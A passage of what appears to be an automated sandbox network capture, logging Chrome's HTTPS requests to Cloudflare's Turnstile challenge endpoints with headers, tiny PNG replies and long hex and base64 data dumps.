                                                                                                                                              2024-11-06 15:55:40 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 49 62 47 35 5a 6e 66 4a 34 2d 38 33 73 6a 2d 34 68 62 39 2d 71 61 46 67 62 4d 72 36 31 55 5f 77 69 51 4e 42 74 4b 72 4e 4f 4b 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gIbG5ZnfJ4-83sj-4hb9-qaFgbMr61U_wiQNBtKrNOKEAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                              2024-11-06 15:55:40 UTC1INData Raw: 4a
                                                                                                                                              Data Ascii: J


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              42192.168.2.1849791104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:40 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8de644ce9b5745f6/1730908538244/-_ter8awBYLmx72 HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:40 UTC200INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:40 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 61
                                                                                                                                              Connection: close
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644ec1f82d5db-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 2b 08 02 00 00 00 54 ef 59 e4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                              Data Ascii: PNGIHDRH+TYIDAT$IENDB`


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              43192.168.2.1849792104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:41 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8de644ce9b5745f6/1730908538244/-_ter8awBYLmx72 HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:41 UTC200INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:41 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 61
                                                                                                                                              Connection: close
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644f0c9a76c04-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 2b 08 02 00 00 00 54 ef 59 e4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                              Data Ascii: PNGIHDRH+TYIDAT$IENDB`


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              44192.168.2.1849793104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:42 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 31664
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              CF-Challenge: 10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:42 UTC16384OUTData Raw: 76 5f 38 64 65 36 34 34 63 65 39 62 35 37 34 35 66 36 3d 44 78 69 42 62 74 61 4d 6b 53 6b 57 6b 61 4b 61 35 67 41 67 4f 63 7a 74 67 4d 61 48 67 79 42 68 78 61 45 67 25 32 62 42 53 69 74 52 57 67 47 42 47 69 74 54 67 24 41 42 67 78 42 67 2d 69 67 44 42 69 6b 61 6c 74 68 42 67 5a 53 67 43 71 74 65 67 5a 2d 78 42 67 38 42 54 36 67 35 6b 6a 64 6a 6a 45 42 4f 69 53 67 74 64 62 4c 42 67 43 67 70 34 52 4d 59 73 69 31 76 24 6e 67 54 34 52 65 55 36 6b 31 6c 67 4c 64 64 73 39 36 67 44 6b 55 47 49 67 70 53 67 63 71 67 4f 76 6a 61 4f 58 66 78 47 67 74 4d 48 4d 47 30 6a 64 57 62 34 42 67 36 47 4d 69 74 6a 6b 44 36 30 47 73 62 66 2b 65 78 67 31 4c 75 76 61 42 74 47 34 4a 71 67 53 24 6e 30 74 39 59 52 50 69 57 64 42 7a 2d 59 64 6b 36 6c 6c 6d 41 54 6f 50 59 47 58 46 4f
                                                                                                                                              Data Ascii: v_8de644ce9b5745f6=DxiBbtaMkSkWkaKa5gAgOcztgMaHgyBhxaEg%2bBSitRWgGBGitTg$ABgxBg-igDBikalthBgZSgCqtegZ-xBg8BT6g5kjdjjEBOiSgtdbLBgCgp4RMYsi1v$ngT4ReU6k1lgLdds96gDkUGIgpSgcqgOvjaOXfxGgtMHMG0jdWb4Bg6GMitjkD60Gsbf+exg1LuvaBtG4JqgS$n0t9YRPiWdBz-Ydk6llmAToPYGXFO
                                                                                                                                              2024-11-06 15:55:42 UTC15280OUTData Raw: 69 5a 7a 7a 42 53 49 24 58 48 4a 67 4e 67 59 52 64 67 4c 67 31 65 31 6f 62 34 67 63 67 63 67 61 69 67 33 67 4d 42 63 69 67 4f 42 61 36 31 6b 61 41 6b 47 42 67 4b 67 45 69 4d 38 67 7a 67 73 67 4f 71 61 67 61 47 67 47 6a 6c 4b 61 4c 67 43 67 74 2b 42 51 67 67 71 54 7a 67 77 67 74 71 54 45 67 32 67 4f 42 63 69 61 72 67 79 42 54 74 36 6b 58 43 49 59 78 67 4f 42 4b 42 63 54 6b 42 42 74 59 74 79 51 6c 45 50 4c 61 42 67 54 6d 31 50 6c 4a 61 76 67 54 6b 70 69 67 36 67 57 70 24 58 55 54 42 31 49 6f 6f 51 34 67 70 49 6f 6a 61 53 67 4c 69 7a 2d 67 63 67 4c 42 61 69 61 72 67 76 4b 63 54 30 55 67 61 36 54 2d 67 73 67 6d 6f 77 42 31 61 67 7a 6a 70 7a 67 67 51 39 6a 61 4b 67 46 67 31 6a 67 4d 61 33 67 58 6a 70 71 31 48 67 79 67 50 50 61 32 67 50 4e 61 6e 67 63 67 79 74
                                                                                                                                              Data Ascii: iZzzBSI$XHJgNgYRdgLg1e1ob4gcgcgaig3gMBcigOBa61kaAkGBgKgEiM8gzgsgOqagaGgGjlKaLgCgt+BQggqTzgwgtqTEg2gOBciargyBTt6kXCIYxgOBKBcTkBBtYtyQlEPLaBgTm1PlJavgTkpig6gWp$XUTB1IooQ4gpIojaSgLiz-gcgLBaiargvKcT0Uga6T-gsgmowB1agzjpzggQ9jaKgFg1jgMa3gXjpq1HgygPPa2gPNangcgyt
                                                                                                                                              2024-11-06 15:55:42 UTC330INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:42 GMT
                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                              Content-Length: 26332
                                                                                                                                              Connection: close
                                                                                                                                              cf-chl-gen: 1sqCQl+TcF0J58QYyul7OV5HdeKWuTZT5IYOEK26Ge28i7lt+eyc/ZeFqCWOofGOgKvw17l0clx+ptA0$6dPkn2D+yFxe6eMc
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644f499e5e587-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:42 UTC1039INData Raw: 70 4a 65 32 77 37 6d 35 75 73 32 4f 70 72 72 50 6b 35 43 52 6c 5a 4f 53 30 73 75 58 6a 74 37 50 6d 35 4b 66 34 70 36 61 76 4a 2b 5a 34 4c 6e 45 34 4f 72 4c 36 2b 48 6e 75 38 2f 6f 78 73 7a 75 73 61 2b 76 36 39 66 75 2b 4e 58 66 33 50 54 62 33 74 4c 56 77 38 2f 57 76 38 54 31 32 67 6b 50 2b 75 6b 49 78 41 30 57 42 67 67 57 41 75 63 51 43 74 77 57 33 50 4c 65 45 41 37 33 32 2f 58 34 33 52 77 69 35 76 37 71 43 67 62 34 4d 41 6f 6c 2f 65 72 74 48 7a 51 70 37 77 51 54 50 67 73 4a 45 44 45 65 4f 68 67 66 51 52 41 67 50 45 49 46 48 77 73 34 49 79 4a 53 49 6c 49 71 51 6b 4e 42 45 52 41 6c 54 78 68 59 4b 46 39 66 4b 54 34 56 51 43 55 78 5a 31 39 61 48 47 70 45 62 6d 51 74 53 44 77 70 4d 45 42 6d 56 69 39 4c 4d 48 42 62 61 48 46 37 61 6b 74 33 57 54 39 65 51 31 74
                                                                                                                                              Data Ascii: pJe2w7m5us2OprrPk5CRlZOS0suXjt7Pm5Kf4p6avJ+Z4LnE4OrL6+Hnu8/oxszusa+v69fu+NXf3PTb3tLVw8/Wv8T12gkP+ukIxA0WBggWAucQCtwW3PLeEA732/X43Rwi5v7qCgb4MAol/ertHzQp7wQTPgsJEDEeOhgfQRAgPEIFHws4IyJSIlIqQkNBERAlTxhYKF9fKT4VQCUxZ19aHGpEbmQtSDwpMEBmVi9LMHBbaHF7akt3WT9eQ1t
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 44 78 72 4f 35 72 72 57 6f 72 61 2b 36 76 61 6d 77 74 64 50 43 78 4e 72 6c 6f 38 43 32 76 61 6e 62 33 4e 75 69 79 4c 37 79 79 4e 54 71 37 76 58 75 34 74 6e 33 7a 4c 6e 54 2f 4e 44 52 41 73 50 59 39 4e 50 65 77 39 33 39 34 51 4c 6b 7a 50 7a 75 79 4d 37 4d 78 2b 62 30 44 52 4d 61 39 2b 76 35 36 50 4d 55 41 68 4c 6a 44 53 48 37 35 4e 38 61 2b 52 73 62 37 41 66 68 4a 2b 63 62 45 77 67 6d 4e 7a 58 32 41 68 73 6d 38 68 55 64 44 52 63 68 44 6b 4d 45 50 79 63 53 49 41 51 30 51 69 52 43 53 77 30 39 4c 30 51 72 44 43 78 42 4d 30 34 74 55 6a 77 72 4f 68 31 42 4c 6c 55 67 48 6a 6c 47 4e 45 63 70 58 45 70 6f 4f 55 35 75 61 32 42 44 51 48 56 30 51 58 4e 58 56 47 52 37 52 45 59 38 57 46 73 7a 4f 57 42 54 50 46 68 65 59 6c 52 64 52 58 68 39 59 56 31 6b 66 47 64 64 63 32
                                                                                                                                              Data Ascii: DxrO5rrWora+6vamwtdPCxNrlo8C2vanb3NuiyL7yyNTq7vXu4tn3zLnT/NDRAsPY9NPew9394QLkzPzuyM7Mx+b0DRMa9+v56PMUAhLjDSH75N8a+Rsb7AfhJ+cbEwgmNzX2Ahsm8hUdDRchDkMEPycSIAQ0QiRCSw09L0QrDCxBM04tUjwrOh1BLlUgHjlGNEcpXEpoOU5ua2BDQHV0QXNXVGR7REY8WFszOWBTPFheYlRdRXh9YV1kfGddc2
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 79 37 4b 37 30 74 69 76 76 4d 44 54 78 63 4b 66 31 39 6a 5a 76 2b 33 4e 72 63 44 4b 35 4b 79 72 7a 74 48 7a 34 38 65 35 38 4d 66 5a 36 50 6a 76 38 4c 66 54 2f 4f 4c 45 42 51 4c 57 2f 66 37 4b 35 73 66 48 43 67 67 54 2f 67 48 78 36 2f 62 6a 36 42 73 4b 42 51 63 51 47 78 6a 58 33 76 50 36 49 77 49 6f 35 2f 58 31 2b 50 50 6a 39 67 73 73 49 4f 66 76 4b 53 67 7a 4a 54 6a 76 4e 68 76 37 4c 77 67 5a 46 51 45 55 2b 53 38 51 4c 6a 67 6d 42 44 73 38 4e 69 41 65 4c 67 38 75 4f 6a 41 78 56 45 56 45 4a 56 4d 76 52 45 77 7a 4e 46 31 61 55 45 38 61 48 43 56 50 52 56 73 32 53 30 6f 37 62 46 63 36 54 69 78 6a 5a 44 4e 49 52 6c 59 33 61 47 6c 58 53 55 5a 6e 57 30 67 35 66 6c 4e 41 54 58 39 47 69 47 64 6e 66 56 6c 75 5a 6e 74 66 54 30 31 6b 55 55 31 6e 61 35 6c 72 6a 6c 64
                                                                                                                                              Data Ascii: y7K70tivvMDTxcKf19jZv+3NrcDK5KyrztHz48e58MfZ6Pjv8LfT/OLEBQLW/f7K5sfHCggT/gHx6/bj6BsKBQcQGxjX3vP6IwIo5/X1+PPj9gssIOfvKSgzJTjvNhv7LwgZFQEU+S8QLjgmBDs8NiAeLg8uOjAxVEVEJVMvREwzNF1aUE8aHCVPRVs2S0o7bFc6TixjZDNIRlY3aGlXSUZnW0g5flNATX9GiGdnfVluZntfT01kUU1na5lrjld
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 4b 2b 36 6e 37 6e 5a 76 64 33 41 71 4e 6a 4b 79 61 47 6e 33 65 44 55 35 2b 36 2f 34 63 58 56 7a 64 54 4c 38 50 50 6f 7a 63 2f 5a 34 74 4c 55 76 50 54 55 32 66 6f 4e 2b 2b 33 6a 44 52 48 72 43 74 7a 6d 33 2b 41 48 46 65 73 4e 38 38 37 36 36 41 2f 73 39 65 34 6b 39 50 4d 54 48 51 67 6e 47 76 4d 41 4c 66 59 47 4a 69 58 77 43 75 73 41 39 53 55 53 37 79 62 74 4b 54 67 49 39 6a 30 73 2b 69 48 38 46 52 67 70 4f 55 45 39 53 53 6b 6d 4b 7a 45 4c 4a 69 38 52 45 78 56 46 46 43 52 45 55 79 52 65 4c 57 41 61 47 55 49 6a 4f 54 52 65 58 54 73 2b 57 55 6c 6f 59 7a 68 74 52 31 34 6f 57 30 73 39 56 45 74 4e 52 6d 64 30 66 56 56 2f 4e 7a 68 38 61 32 51 32 66 6e 39 67 52 33 35 64 65 6f 78 56 59 56 68 4d 51 32 6c 64 54 31 35 68 6b 70 68 56 5a 58 79 4e 6d 5a 4f 53 65 47 2b 44
                                                                                                                                              Data Ascii: K+6n7nZvd3AqNjKyaGn3eDU5+6/4cXVzdTL8PPozc/Z4tLUvPTU2foN++3jDRHrCtzm3+AHFesN88766A/s9e4k9PMTHQgnGvMALfYGJiXwCusA9SUS7ybtKTgI9j0s+iH8FRgpOUE9SSkmKzELJi8RExVFFCREUyReLWAaGUIjOTReXTs+WUloYzhtR14oW0s9VEtNRmd0fVV/Nzh8a2Q2fn9gR35deoxVYVhMQ2ldT15hkphVZXyNmZOSeG+D
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 79 67 79 4e 72 6b 75 71 6e 69 71 72 4c 53 34 61 7a 67 37 65 75 7a 35 76 72 4e 75 75 66 72 73 73 75 34 41 64 44 4e 78 74 30 44 30 63 66 33 78 67 6a 4d 78 64 30 41 36 50 73 45 44 65 63 4c 41 76 6a 32 47 50 63 50 48 39 2f 57 36 78 30 53 46 2f 63 69 43 42 33 32 35 79 54 38 47 53 51 75 4d 51 51 64 48 69 49 4a 4e 53 73 46 4b 51 6f 62 39 78 41 78 4c 76 49 73 45 54 49 53 4f 53 39 48 41 55 49 43 41 77 30 33 43 52 77 76 48 6a 34 77 56 43 73 7a 4e 69 6f 51 4f 53 73 56 58 54 34 5a 47 55 42 4f 4d 56 55 76 56 45 63 79 48 45 56 4d 4f 69 35 50 5a 45 35 4f 58 6d 6c 47 5a 57 45 78 53 6b 78 58 57 6e 51 35 61 6b 78 42 63 47 31 67 68 46 52 6f 5a 57 70 44 64 6d 74 6d 69 32 70 4c 59 6e 35 7a 54 59 43 4a 63 32 56 69 61 6e 65 4f 6c 48 47 4a 62 59 6c 75 66 34 46 32 6c 34 64 68 65
                                                                                                                                              Data Ascii: ygyNrkuqniqrLS4azg7euz5vrNuufrssu4AdDNxt0D0cf3xgjMxd0A6PsEDecLAvj2GPcPH9/W6x0SF/ciCB325yT8GSQuMQQdHiIJNSsFKQob9xAxLvIsETISOS9HAUICAw03CRwvHj4wVCszNioQOSsVXT4ZGUBOMVUvVEcyHEVMOi5PZE5OXmlGZWExSkxXWnQ5akxBcG1ghFRoZWpDdmtmi2pLYn5zTYCJc2VianeOlHGJbYluf4F2l4dhe
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 4a 77 4e 44 63 70 75 58 73 78 39 62 4e 37 4c 4c 38 32 66 54 50 2f 4e 4c 37 76 75 7a 61 2f 4e 6d 36 33 50 77 44 32 64 73 43 41 75 33 78 36 77 66 4d 42 50 62 50 45 66 66 33 36 50 55 4d 2f 52 54 78 41 41 4c 30 42 67 38 65 38 78 51 4c 4b 4f 6a 2b 48 42 34 51 4d 51 30 4f 42 51 38 6b 4a 2f 49 74 4e 79 6f 79 39 53 77 34 2b 6a 30 63 4e 53 41 6d 4d 53 51 6d 45 7a 49 2b 50 30 77 34 4d 42 77 75 4d 69 78 4d 4c 69 55 31 51 51 74 4b 55 53 77 37 4d 6c 45 58 59 54 35 5a 4e 47 45 33 59 43 4e 52 50 32 45 2b 48 30 46 68 5a 7a 35 41 55 30 49 2b 5a 6c 4a 47 55 6d 74 76 63 31 35 6f 58 6b 30 35 63 46 35 52 51 58 68 67 5a 49 46 38 5a 45 53 42 52 49 57 49 57 31 2b 45 5a 57 70 71 69 6d 70 6a 62 59 75 45 54 32 79 51 69 47 75 66 6b 32 42 33 66 34 43 63 67 70 65 47 65 6f 61 67 6a 49
                                                                                                                                              Data Ascii: JwNDcpuXsx9bN7LL82fTP/NL7vuza/Nm63PwD2dsCAu3x6wfMBPbPEff36PUM/RTxAAL0Bg8e8xQLKOj+HB4QMQ0OBQ8kJ/ItNyoy9Sw4+j0cNSAmMSQmEzI+P0w4MBwuMixMLiU1QQtKUSw7MlEXYT5ZNGE3YCNRP2E+H0FhZz5AU0I+ZlJGUmtvc15oXk05cF5RQXhgZIF8ZESBRIWIW1+EZWpqimpjbYuET2yQiGufk2B3f4CcgpeGeoagjI
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 72 39 58 72 32 64 6a 64 36 39 37 4d 33 65 7a 63 39 72 7a 33 34 2b 58 56 39 4f 66 2b 7a 50 37 74 41 38 7a 6a 38 66 44 78 38 2f 66 6c 38 51 7a 35 2b 4e 67 4e 2f 66 73 59 45 41 49 43 2b 52 63 47 48 50 45 63 43 75 54 35 47 67 6b 6b 2b 53 49 54 45 67 34 54 46 78 59 53 4a 68 72 30 45 68 41 66 44 68 59 76 49 6a 67 57 4a 43 63 6c 4a 6a 67 71 4b 45 51 38 4c 45 51 61 50 6a 49 4d 45 55 51 33 53 78 46 46 4e 55 38 64 54 44 38 39 50 6c 4e 43 48 43 46 45 52 6c 73 6c 50 45 6f 6b 4c 56 35 50 54 6b 5a 6b 55 32 68 4b 5a 31 5a 55 63 47 64 62 57 54 56 77 58 6e 52 61 63 57 42 33 50 58 64 68 65 30 6c 38 61 6e 39 4a 65 32 39 75 57 6e 42 79 69 47 5a 6f 64 34 74 56 64 33 75 51 61 6f 39 2b 66 58 36 4f 67 49 43 63 6c 49 64 68 64 70 71 4c 65 57 32 62 6a 36 53 43 68 4a 4f 6e 64 61 4b
                                                                                                                                              Data Ascii: r9Xr2djd697M3ezc9rz34+XV9Of+zP7tA8zj8fDx8/fl8Qz5+NgN/fsYEAIC+RcGHPEcCuT5Ggkk+SITEg4TFxYSJhr0EhAfDhYvIjgWJCclJjgqKEQ8LEQaPjIMEUQ3SxFFNU8dTD89PlNCHCFERlslPEokLV5PTkZkU2hKZ1ZUcGdbWTVwXnRacWB3PXdhe0l8an9Je29uWnByiGZod4tVd3uQao9+fX6OgICclIdhdpqLeW2bj6SChJOndaK
                                                                                                                                              2024-11-06 15:55:42 UTC1369INData Raw: 2f 57 33 32 76 6a 62 33 2f 77 45 41 73 58 69 78 65 50 6e 42 51 34 4b 7a 65 72 4e 36 2b 38 4e 45 50 51 42 37 65 73 55 36 42 45 4c 39 78 67 67 38 77 50 76 41 2b 51 63 33 68 45 6b 42 52 2f 6b 47 77 67 5a 4d 52 38 4d 4c 44 51 49 46 77 59 43 42 78 55 31 2b 42 38 31 44 43 6b 38 48 54 30 61 49 6a 35 42 53 54 30 6f 48 79 4d 4e 52 69 30 72 52 69 77 77 54 56 41 31 51 45 77 73 55 7a 6c 52 56 6a 6c 59 57 45 4e 61 47 31 31 62 52 56 41 79 4f 47 4d 34 5a 57 64 49 54 47 6c 6f 55 56 78 53 53 47 35 56 62 57 35 56 64 46 35 66 65 54 64 35 67 32 46 73 54 6c 52 2f 50 34 45 38 5a 47 32 42 69 34 70 49 54 6b 35 78 66 46 35 6b 6b 55 2b 52 6c 35 5a 55 57 6c 70 34 66 4a 6d 66 6e 6c 78 65 59 6f 57 51 63 6e 69 69 6e 71 57 72 71 6d 68 71 62 6f 79 51 72 62 4f 79 63 59 4e 32 6d 61 53 47
                                                                                                                                              Data Ascii: /W32vjb3/wEAsXixePnBQ4KzerN6+8NEPQB7esU6BEL9xgg8wPvA+Qc3hEkBR/kGwgZMR8MLDQIFwYCBxU1+B81DCk8HT0aIj5BST0oHyMNRi0rRiwwTVA1QEwsUzlRVjlYWENaG11bRVAyOGM4ZWdITGloUVxSSG5VbW5VdF5feTd5g2FsTlR/P4E8ZG2Bi4pITk5xfF5kkU+Rl5ZUWlp4fJmfnlxeYoWQcniinqWrqmhqboyQrbOycYN2maSG


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              45192.168.2.1849794104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:43 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:43 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:43 GMT
                                                                                                                                              Content-Type: application/json
                                                                                                                                              Content-Length: 7
                                                                                                                                              Connection: close
                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              cf-chl-out: sHkok9d8lfoxCk5lz9A92TUuNeJv+EQRSCA=$q45bJ9LhhvxFX5M1
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644fba85f2e72-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:43 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                              Data Ascii: invalid


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              46192.168.2.1849795104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:46 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 34069
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              CF-Challenge: 10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
